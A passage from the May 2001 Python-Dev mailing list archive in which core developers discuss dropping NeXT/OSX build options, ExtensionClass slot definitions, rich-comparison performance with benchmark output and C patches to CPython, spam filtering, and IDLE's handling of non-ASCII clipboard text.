 it's broken for OSX,
 if it worked, it doesn't do the whole job ( I think framework 
   support should eventually be added for OSX with a separate
   post-build script -- a real framework should encapsulate 
   all of the python libs, docs and headers files in one bundle. ) 
 nobody seems to know if it still works on Next or OpenStep.

 However, I said I thought there ought to be some sort of official
procedure for removing platform support. 
 
 This doesn't seem to be addressed in either PEP 4 (Deprecation
of Standard Modules) or PEP 5 (Guidelines for Language Evolution).

 I don't think it needs to be as involved a process as PEP 4 or 5 --
it's a more reversable decision than removing a feature from the
language.  Although, removing a platform dependent feature -- 
like in the long discussion about case sensitivity -- may be a 
bigger deal. 
 But I'm really thinking more about things like the Next case -- 
where there are build options and #ifdefs that, as far as we know,
haven't been tested in several versions. ( Believe it or not, there
are still folks hanging dearly onto their black NeXT cubes, and finding
the useful -- but I have no idea if any of them are using Python, 
and there's lots of users out there whom we only hear from when they
discover a problem. ) 

 Perhaps there should be some sort of "Last Call for Platform Saviour" :
if nobody steps forward who is willing to do test builds on that 
platform, support may be removed if maintaining it is getting in the way. 
 

 Any thougts or opinions on this? 

 Are there any other platforms where this might become an issue ? 
 If this looks like it's unlikely to crop up again, then maybe we
  don't need to bother with a 'policy'. 

 What about support for particular compilers and build environments: 
 (Borland C on Windows and MPW on Mac are two examples of "minority" 
   compilers.) 


BTW: As I've though more about this particular issue (--with-next-framework) 
 I don't think it's as big an issue -- removing that switch isn't going
 to break the build entirely (I think!). Pulling out all of the 
 #ifdefs for Next would be a larger issue, but that hasn't been proposed
 (yet). If the consensus is that this isn't a big enough issue, in general,
 to need an official policy, then I vote to pull it out and see if anyone
 screams. 

 
-- Steve Majewski


From guido at digicool.com  Mon May 14 22:53:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 15:53:26 -0500
Subject: [Python-Dev] deprecated platforms
In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400."
             <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu> 
References: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu> 
Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com>

I can't really add much to this discussion, since I have *absolutely*
*no* *idea* what kind of framework we're talking about here...

I agree with Steve that we shouldn't be too scared of removing support
for obsolete platforms.  People hanging on to obsolete platforms may
as well hang on to obsolete Python versions...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 21:40:21 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 21:40:21 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com>
Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>

> Okay, so I'm completed confused now.  I extended the definition of
> ECTypeType to include this after the doc string slot:
> 
>       (traverseproc)0,              /* tp_traverse */
>       (inquiry)0,                   /* tp_clear */
>       (richcmpfunc)0,               /* rich comparisons */
>       0L,                           /* weak reference enabler */
> 
>     #ifdef COUNT_ALLOCS
>       /* these must be last */
>       0,                            /* tp_alloc */
>       0,                            /* tp_free */
>       0,                            /* tp_maxalloc */
>       (struct _typeobject *)0,      /* tp_next */
>     #endif

Why did you do that? ECTypeType has the right data type
(PyTypeObject). It is the instances of PyExtensionClass that are
troubling

> When I looked at the definition of ECType, after the doc string I saw
> 
>       METHOD_CHAIN(ExtensionClass_methods)
> 
> as Martin indicated.  I can't simply insert the same zeroes at the end of
> the ECType def'n as I did at the end of the ECTypeType definition.  

Of course not. ECType is of type PyExtensionClass, not of type
PyTypeObject. Those are similar, but not equal.

> Where does this METHOD_CHAIN thing go?  I looked at the def'n of
> struct _typeobject in Include/object.h but didn't see a slot that
> looked suitable.

Just have a look at ExtensionClass.h instead.

> FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
> I get 
> 
>     Fatal Python error: UNREF invalid object
> 
> when I run my failing script.  This is with and without making any changes
> to ECType or ECTypeType.

BTW, what version of PyGtk did you try to compile? I've tried the
0.7.0-dont-use, and it can run examples/testgtk without major problems
(the example did need some updates, since it is apparently outdated).
My Gtk version was 1.2, on Linux.

In any case, I think you need to analyse this in a debugger.

Regards,
Martin


From tim at digicool.com  Mon May 14 22:12:44 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 14 May 2001 16:12:44 -0400
Subject: [Python-Dev] Comparison speed
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>

Here's a simple test program:

from time import clock

indices = [1] * 100000

def doit():
    s = clock()
    i = 0
    while i < 100000:
        "ab" < "cd"
        i += 1
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS:

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.107
0.106
0.109
0.106
0.106
0.106
0.106
0.106
0.105
0.106

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.118
0.118
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

C:\Code\python\dist\src\PCbuild>python timech.py
0.119
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

So "something happened" between 2.0 and 2.1 to slow this overall by 10%.
string_compare hasn't changed, so rich comparisons are a good guess.  Note
that the more obvious timing loop obscures the issue:

def doit():
    s = clock()
    for i in indices:
        "ab" < "cd"
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.070
0.069
0.069
0.070
0.069
0.069
0.069
0.070
0.069
0.069

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.076
0.076
0.076
0.076
0.076
0.077
0.076
0.076
0.076
0.076

C:\Code\python\dist\src\PCbuild>python timech.py
0.069
0.070
0.070
0.069
0.069
0.070
0.070
0.069
0.070
0.069

for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out
the comparison slowdown.

If we try it with a type of comparison that avoids the richcmp machinery
(int < int is special-cased in ceval), current CVS is actually faster than
2.0:

def doit():
    s = clock()
    for i in indices:
        2 < 3
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.056
0.056
0.056
0.056
0.055
0.056
0.058
0.058
0.055
0.056

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.059
0.059
0.059
0.060
0.060
0.059
0.059
0.060
0.059
0.059

C:\Code\python\dist\src\PCbuild>python timech.py
0.053
0.052
0.052
0.053
0.053
0.052
0.052
0.054
0.052
0.053

C:\Code\python\dist\src\PCbuild>

This also shows that 2.1 was a bit more slothful than 2.0 for some reason
other than richcmps.

These were all done on a Win2K box; timings vary too much on a Win9x box to
be useful.

Anybody care to take a stab at making the new richcmp and/or coerce code
ugly again?

speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 22:34:35 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 22:34:35 +0200
Subject: [Python-Dev] deprecated platforms
Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de>

> I'm all for removing it:

So am I. There are way too many build options for build Python on the
Mac-like systems already (e.g. after that change, you still have
--with-dyld - or rather the option of still building .o extensions).

If it is clearly broken (even if only on OSX), it should be
removed. Anybody interested in the flag would need to make it work
correctly before it can be revived.

> However, I said I thought there ought to be some sort of official
> procedure for removing platform support. 

I don't think such a procedure is necessary. It is not that any end
user would be concerned; building Python is an activity of system
administrators. The other PEPs are there because changing the language
or removing modules might break *applications* that used to work after
an upgrade of Python. With removed platform support, nothing will
break - installations would continue to use the last release that did
support that platform.

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 00:06:57 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 00:06:57 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

When stepping through the code, I also missed support for the
relationship between identity and equality. E.g. in
PyObject_RichCompare, I'd expect

  if (v == w) {
     switch (op)
     case Py_EQ:case Py_LE:case Py_GE:
        Py_INCREF(Py_True);
        return Py_True;
     case Py_NE:case Py_LT:case Py_GT:
        Py_INCREF(Py_False);
        return Py_False;
     }
  }

That would not help in your case, of course. I don't even know how
frequent comparing identical objects is in real life - but this is
something that PyObject_Compare has that PyObject_RichCompare
currently doesn't.

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 23:55:39 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 23:55:39 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

Hi Tim,

With CVS Python, 1000000 iterations, and a for loop, I currently got

0.780
0.770
0.770
0.780
0.770
0.770
0.770
0.780
0.770
0.770

With the patch below, I get

0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720
0.710
0.710

The idea is to let strings support richcmp; this also allows some
optimization for the EQ case.

Please let me know what you think.

Martin

Index: stringobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v
retrieving revision 2.115
diff -u -r2.115 stringobject.c
--- stringobject.c	2001/05/10 00:32:57	2.115
+++ stringobject.c	2001/05/14 21:36:36
@@ -596,6 +596,51 @@
 	return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0;
 }
 
+/* In the signature, only a is guaranteed to be a PyStringObject.
+   However, as the first thing in the function, we check that b
+   is of that type also.  */
+
+static PyObject*
+string_richcompare(PyStringObject *a, PyStringObject *b, int op)
+{
+	int c;
+	PyObject *result;
+	if (!PyString_Check(b)) {
+		result = Py_NotImplemented;
+		goto out;
+	}
+	if (op == Py_EQ) {
+		if (a->ob_size != b->ob_size) {
+			result = Py_False;
+			goto out;
+		}
+#ifdef CACHE_HASH
+		if (a->ob_shash != b->ob_shash
+		    && a->ob_shash != -1 
+		    && b->ob_shash != -1) {
+			result = Py_False;
+			goto out;
+		}
+#endif
+	}
+	c = string_compare(a, b);
+	switch (op) {
+	case Py_LT: c = c <  0; break;
+	case Py_LE: c = c <= 0; break;
+	case Py_EQ: c = c == 0; break;
+	case Py_NE: c = c != 0; break;
+	case Py_GT: c = c >  0; break;
+	case Py_GE: c = c >= 0; break;
+	default:
+		result = Py_NotImplemented;
+		goto out;
+	}
+	result = c ? Py_True : Py_False;
+  out:
+	Py_INCREF(result);
+	return result;
+}
+
 static long
 string_hash(PyStringObject *a)
 {
@@ -2409,6 +2454,12 @@
 	&string_as_buffer,	/*tp_as_buffer*/
 	Py_TPFLAGS_DEFAULT,	/*tp_flags*/
 	0,		/*tp_doc*/
+	0,		/*tp_traverse*/
+	0,		/*tp_clear*/
+	(richcmpfunc)string_richcompare,	/*tp_richcompare*/
+	0,		/*tp_weaklistoffset*/
+	0,		/*tp_iter*/
+	0,		/*tp_iternext*/
 };
 
 void


From gstein at lyra.org  Tue May 15 00:17:56 2001
From: gstein at lyra.org (Greg Stein)
Date: Mon, 14 May 2001 15:17:56 -0700
Subject: [Python-Dev] Comparison speed
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>
Message-ID: <20010514151755.P1374@lyra.org>

On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote:
>...
> Anybody care to take a stab at making the new richcmp and/or coerce code
> ugly again?
> 
> speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim

Euh... isn't Guido's preference for cleanliness over speed?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From tim at digicool.com  Tue May 15 00:35:33 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 14 May 2001 18:35:33 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010514151755.P1374@lyra.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIGCAAA.tim@digicool.com>

[Greg Stein]
> Euh... isn't Guido's preference for cleanliness over speed?

So do both.


From greg at cosc.canterbury.ac.nz  Tue May 15 03:42:49 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 15 May 2001 13:42:49 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin at loewis.home.cs.tu-berlin.de>:

> I also missed support for the
> relationship between identity and equality.

That would severely restrict the semantics that could be given
to the comparison operators by overloading them.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Tue May 15 04:40:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 21:40:33 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST."
             <20010514151755.P1374@lyra.org> 
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>  
            <20010514151755.P1374@lyra.org> 
Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com>

> > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim
> 
> Euh... isn't Guido's preference for cleanliness over speed?

Yeah, Tim & I have developed a nice good-cop-bad-cop routine about
this. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Tue May 15 05:36:42 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 14 May 2001 23:36:42 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> When stepping through the code, I also missed support for the
> relationship between identity and equality. E.g. in
> PyObject_RichCompare, I'd expect
>
>   if (v == w) {
>      switch (op)
>      case Py_EQ:case Py_LE:case Py_GE:
>         Py_INCREF(Py_True);
>         return Py_True;
>      case Py_NE:case Py_LT:case Py_GT:
>         Py_INCREF(Py_False);
>         return Py_False;
>      }
>   }
>
> That would not help in your case, of course. I don't even know how
> frequent comparing identical objects is in real life - but this is
> something that PyObject_Compare has that PyObject_RichCompare
> currently doesn't.

Guido insisted (with cause <wink>) on these four pairs as being equivalent:

    x <  y  iff  y >  x
    x <= y       y >= x
    x == y       y == x
    x != y       y != x

but beyond that, in the presence of rich comparisons, agreed not to make any
other assumptions about what those pixel-bags "mean".  In particular, there's
no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies
"x != y", etc.

Applying that to the above leaves you with nothing but

   if (v == w && op == Py_EQ) /* then return Py_True */

Which is about all PyObject_Compare's

	if (v == w)
		return 0;

assumes too.  So I don't see much future in that.

[later, a patch to fill in the richcmp slot for strings]
> +static PyObject*
> +string_richcompare(PyStringObject *a, PyStringObject *b, int op)
> +{
> +	int c;
> +	PyObject *result;
> +	if (!PyString_Check(b)) {
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	if (op == Py_EQ) {
> +		if (a->ob_size != b->ob_size) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#ifdef CACHE_HASH
> +		if (a->ob_shash != b->ob_shash
> +		    && a->ob_shash != -1
> +		    && b->ob_shash != -1) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#endif
> +	}
> +	c = string_compare(a, b);
> +	switch (op) {
> +	case Py_LT: c = c <  0; break;
> +	case Py_LE: c = c <= 0; break;
> +	case Py_EQ: c = c == 0; break;
> +	case Py_NE: c = c != 0; break;
> +	case Py_GT: c = c >  0; break;
> +	case Py_GE: c = c >= 0; break;
> +	default:
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	result = c ? Py_True : Py_False;
> +  out:
> +	Py_INCREF(result);
> +	return result;

[and that yields about an 8% speedup in the "<" case]

That looks on the right track, but maybe at the wrong level:  why is it
necessary?  That is, the bulk of the "smarts" here in the switch stmt are
type-independent:  if there's no specific implementation of individual
comparisons, but there is a tp_compare, then the switch stmt applies verbatim
to *any* such type.  Do we have to fill in the richcmp slot for everything to
get Python to realize that?  I mean "just about everything", too:  while,
e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min
etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then,
but thru the general comparison routines).

The "speed problem" appears to be:

+ COMPARE_OP calls cmp_outcome()
+   which calls PyObject_RichCompare()
+     which calls do_richcmp()
+       which calls try_rich_compare() (unsuccessfully now,
                                        successfully after your patch)
          which fails to find a richcmp slot on either operand (now)
          so says "not implemented"
+       then calls try_3way_to_rich_compare()
+         which calls try_3way_compare()
+            which finally calls the tp_compare slot
+            then runs exactly the same
   		switch (op) {
		case Py_LT: c = c <  0; break;
		case Py_LE: c = c <= 0; break;
		case Py_EQ: c = c == 0; break;
		case Py_NE: c = c != 0; break;
		case Py_GT: c = c >  0; break;
		case Py_GE: c = c >= 0; break;
		}
        	result = c ? Py_True : Py_False;
             switch as your patch

and things unwind.  So we've got 7 function calls there, not even counting
calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine
instructions that actually do the compare <wink>.

You got an 8% speedup for one type by tricking the switch stmt into appearing
3 calls earlier.  What if the implementation were smarter, and did it for
*all* relevant types even a call or two before that?

I don't see any reason "in principle" that compares couldn't be much faster,
and via the usual gimmicks:  bigger, smarter functions that remember what
they've already determined so don't need to figure it out over and over
again, and fast paths to favor common cases at the expense of comparisons
from Mars.  One thing to note here:  the workhorse comparisons are "like
strings" in having no *logical* need for richcmps at all; and the objects for
which richcmps were introduced were numerical arrays, which can much better
afford a longer code path to *find* them (one matrix compare will trigger
many vanilla element compares anyway, so even for arrays it's much more
important that the *latter* be fast).  The code now is approximately
backwards in that respect (it takes gobs of work before we even *look* for a
cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're
doing an explict "cmp" compare, the code now tries to *simulate* cmp first
via a long sequence of richcmp calls!).

I don't have time to uglify this code, but Python would benefit from it.

and-no-matter-what-guido-may-say<wink>-ly y'rs  - tim


From tim.one at home.com  Tue May 15 05:50:00 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 14 May 2001 23:50:00 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>

[Guido]
> Index: spam.c
> ...

Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
with "spam" in the subject line, and my mail reader moves that to a special
spam folder upon delivery.  So far this is the one and only incoming email
it's moved.  Many solicitations to help foreign nationals move large sums of
money out of their country have gotten through, along with a number of
intriguing promises that I can easily increase the size of my penis -- like I
have any need for either of those <wink>.

reads-every-spam-he-gets-top-to-bottom-ly y'rs  - tim


From esr at thyrsus.com  Tue May 15 05:53:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 23:53:38 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400
References: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>
Message-ID: <20010514235338.C663@thyrsus.com>

Tim Peters <tim.one at home.com>:
>              Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through, along with a number of
> intriguing promises that I can easily increase the size of my penis -- like I
> have any need for either of those <wink>.

What we should truly fear is the prospect that you might increase the size
of your <wink>.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The state calls its own violence `law', but that of the individual `crime'"
	-- Max Stirner


From uche.ogbuji at fourthought.com  Tue May 15 06:26:31 2001
From: uche.ogbuji at fourthought.com (Uche Ogbuji)
Date: Mon, 14 May 2001 22:26:31 -0600
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules 
 spam.c,1.1.2.3,1.1.2.4
In-Reply-To: Message from "Tim Peters" <tim.one@home.com> 
   of "Mon, 14 May 2001 23:50:00 EDT." <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com> 
Message-ID: <200105150426.f4F4QVx01531@localhost.local>

> [Guido]
> > Index: spam.c
> > ...
> 
> Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
> with "spam" in the subject line, and my mail reader moves that to a special
> spam folder upon delivery.  So far this is the one and only incoming email
> it's moved.  Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through [...]

I thought I was th only one getting all these silly Nigerian scam spams.  I 
figured maybe they saw my name and decided to test on me (though they might 
more cleverly have figured that a fellow Nigerian would be wise to the game).

However, with the (sloppily) bogus headers I've always found on those things, 
I'm surprised your ISP couldn't sniff them out.

Not that it matters.  The Eastern Nigerian proverb gets it right.

"Once hunters learn to shoot without missing, birds will learn to fly without 
resting".


-- 
Uche Ogbuji                               Principal Consultant
uche.ogbuji at fourthought.com               +1 303 583 9900 x 101
Fourthought, Inc.                         http://Fourthought.com 
4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one at home.com  Tue May 15 08:28:34 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 02:28:34 -0400
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEEKCAA.tim.one@home.com>

[Guido]
> Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

[Martin]
> Perhaps the Tcl version? That sounds like the issue that Marc talked
> about: Tk behaves differently when text is entered programmatically
> (and perhaps through cut-n-paste), as compared to text entered through
> the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
> Solaris 8 still gives me the UnicodeError.

I don't know which version of Python Guido used.  I tried cut-&-paste of

    s='??'

from his email into the distributed 2.1 IDLE under Win98, and got

    UnicodeError: ASCII encoding error: ordinal not in range(128)

Tk appears to interfere with using the usual Windows ALT+0nnn method of
entering funny characters, so unsure what happens then -- but for me it
either works fine or does something insane (moves the cursor to the left
margin, brings up an IDLE dialog box, etc).

If I open the system Character Map utility and copy-&-paste using *that*, I
can enter all sorts of stuff without problem:

>>> s = "?????????????????????????????????"
>>> s
'\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
>>>

So not all clipboard entries are created equal.

Another clue:  if I paste the s='??' snippet from Guido's email into a file
opened with Notepad, then immediately copy it again from the Notepad doc,
then paste that into Idle, again no problem:

>>> s='??'
>>> s
'\xe4\xf6'
>>>

Using a clipboard diagnostic tool I don't understand, when I copy from
Notepad these data formats are in the system clipboard:

    TEXT
    LOCALE
    OEMTEXT

But when I copy from Guido's email under Outlook 2000, it's

    DataObject
    Rich Text Format
    Rich Text Format Without Objects
    RTF as Text
    TEXT
    UNICODTEXT
    Ole Private Data
    LOCALE
    OEMTEXT

Under Character Map, it's

    Rich Text Format
    TEXT
    LOCALE
    OEMTEXT

So perhaps it's not the version of Tk but the source of the data, and that Tk
grabs an unfortunate data format (when present) from the clipboard in
preference to a fortunate one.

the-clipboard-is-a-complex-beast-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 08:44:23 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 08:44:23 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>

> Applying that to the above leaves you with nothing but
> 
>    if (v == w && op == Py_EQ) /* then return Py_True */
> 
> [...] So I don't see much future in that.

Is this really exactly what Python would guarantee? I'm surprised that
x==x would always be true, but x!=x might be true also. In a type where
x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
I had expected that you'd reduced it to

  if (v == w && op == Py_EQ) /* then return Py_True */
  if (v == w && op == Py_NE) /* then return Py_False */

The one application where this may help is list_contains, in
particular when searching a list of interned strings.

> You got an 8% speedup for one type by tricking the switch stmt into
> appearing 3 calls earlier.  What if the implementation were smarter,
> and did it for *all* relevant types even a call or two before that?

Please have a look at the patch below. Since I made a CVS update since
yesterday, I had to readjust the baseline results:

0.790
0.780
0.770
0.780
0.780
0.790
0.780
0.790
0.790
0.790

The patch moves the case "equal types, supporting cmp" to somewhat
earlier, just after the attempt to do richcompare. Now I get

0.760
0.770
0.750
0.770
0.750
0.750
0.760
0.760
0.760
0.760

So while there is some saving, this is not as good as implementing
richcompare.

> I don't see any reason "in principle" that compares couldn't be much
> faster, and via the usual gimmicks: bigger, smarter functions that
> remember what they've already determined so don't need to figure it
> out over and over again, and fast paths to favor common cases at the
> expense of comparisons from Mars.

I agree "in principle" :-) However, you cannot move the case "equal
types, implementing tp_compare" before the case "one of them
implements tp_richcompare" without changing the semantics. 

The change here is what you'd do when you have both richcmp and
oldcomp; Python clearly mandates using richcmp. In case this is not
obvious (it wasn't to me): UserList will complain about using the
deprecated __cmp__, and dictionaries will iterate over their elements
differently.

Given that richcomp has to be tried first, this patch does the "common
case" at the earliest possible time, and with no overhead, except for
PyErr_Occurred call.

So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT
TP_RICHCOMPARE (sorry for shouting). If you think the extra work for
type implementors is not acceptable, we can offer a convenience
function that everybody implementing tp_compare can put into
tp_richcompare. For strings, I would still special-case
tp_richcompare: when tracing calls to string_richcompare, I found that
most calls with Py_EQ can be decided by checking that the string
lengths are not equal. This is all "bigger, faster functions" put to
work.

Regards,
Martin

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -u -r2.131 object.c
--- object.c	2001/05/11 03:36:45	2.131
+++ object.c	2001/05/15 06:16:53
@@ -477,16 +477,6 @@
 	if (PyInstance_Check(w))
 		return (*w->ob_type->tp_compare)(v, w);
 
-	/* If the types are equal, don't bother with coercions etc. */
-	if (v->ob_type == w->ob_type) {
-		if ((f = v->ob_type->tp_compare) == NULL)
-			return 2;
-		c = (*f)(v, w);
-		if (PyErr_Occurred())
-			return -2;
-		return c < 0 ? -1 : c > 0 ? 1 : 0;
-	}
-
 	/* Try coercion; if it fails, give up */
 	c = PyNumber_CoerceEx(&v, &w);
 	if (c < 0)
@@ -590,15 +580,21 @@
    -1 if v < w;
     0 if v == w;
     1 if v > w;
+   If the object implements a tp_compare function, it returns
+   whatever this function returns (whether with an exception or not).
 */
 static int
 do_cmp(PyObject *v, PyObject *w)
 {
 	int c;
+	cmpfunc f;
 
 	c = try_rich_to_3way_compare(v, w);
 	if (c < 2)
 		return c;
+	if (v->ob_type == w->ob_type
+	    && (f = v->ob_type->tp_compare) != NULL)
+		return (*f)(v, w);
 	c = try_3way_compare(v, w);
 	if (c < 2)
 		return c;
@@ -760,16 +756,9 @@
 }
 
 static PyObject *
-try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+convert_3way_to_object(int op, int c)
 {
-	int c;
 	PyObject *result;
-
-	c = try_3way_compare(v, w);
-	if (c >= 2)
-		c = default_3way_compare(v, w);
-	if (c <= -2)
-		return NULL;
 	switch (op) {
 	case Py_LT: c = c <  0; break;
 	case Py_LE: c = c <= 0; break;
@@ -782,16 +771,46 @@
 	Py_INCREF(result);
 	return result;
 }
+	
 
 static PyObject *
+try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+{
+	int c;
+
+	c = try_3way_compare(v, w);
+	if (c >= 2)
+		c = default_3way_compare(v, w);
+	if (c <= -2)
+		return NULL;
+	return convert_3way_to_object(op, c);
+}
+
+static PyObject *
 do_richcmp(PyObject *v, PyObject *w, int op)
 {
 	PyObject *res;
+	cmpfunc f;
 
+
 	res = try_rich_compare(v, w, op);
 	if (res != Py_NotImplemented)
 		return res;
 	Py_DECREF(res);
+
+	/* If the types are equal, don't bother with coercions etc. 
+	   Instances are special-cased in try_3way_compare, since
+	   a result of 2 does *not* mean one value being greater
+	   than the other. */
+	if (v->ob_type == w->ob_type
+	    && !PyInstance_Check(v)
+	    && (f = v->ob_type->tp_compare) != NULL) {
+		int c;
+		c = (*f)(v, w);
+		if (PyErr_Occurred())
+			return NULL;
+		return convert_3way_to_object(op, c);
+	}
 
 	return try_3way_to_rich_compare(v, w, op);
 }


From tim.one at home.com  Tue May 15 09:33:06 2001
